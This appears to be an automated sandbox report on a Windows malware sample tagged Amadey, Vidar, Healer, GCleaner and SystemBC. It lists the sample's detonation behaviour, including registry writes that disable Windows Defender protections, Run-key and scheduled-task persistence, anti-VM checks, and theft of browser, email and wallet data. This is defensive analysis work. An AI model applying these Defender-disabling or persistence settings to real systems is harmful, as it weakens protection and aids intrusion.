Malware Analysis Report

2025-04-03 09:10

Sample ID 250224-qxpaqavny2
Target f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
SHA256 f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
Tags
amadey gcleaner healer systembc vidar 9c9aa5 a4d2cd credential_access defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5

Threat Level: Known bad

The file f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer systembc vidar 9c9aa5 a4d2cd credential_access defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan

SystemBC

Modifies Windows Defender notification settings

Vidar

Healer

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender DisableAntiSpyware settings

Detects Healer an antivirus disabler dropper

Amadey

Gcleaner family

GCleaner

Modifies Windows Defender TamperProtection settings

Vidar family

Healer family

Detect Vidar Stealer

Amadey family

Systembc family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Uses browser remote debugging

Downloads MZ/PE file

Windows security modification

Reads user/profile data of web browsers

Checks BIOS information in registry

Reads data files stored by FTP clients

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of local email clients

Identifies Wine through registry keys

Checks computer location settings

Unsecured Credentials: Credentials In Files

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies system certificate store

Modifies Internet Explorer settings

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-24 13:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-24 13:38

Reported

2025-02-24 13:41

Platform

win7-20240903-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\ProgramData\rwhkbvh\apitlt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\ProgramData\rwhkbvh\apitlt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbf56223ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\dbf56223ab.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
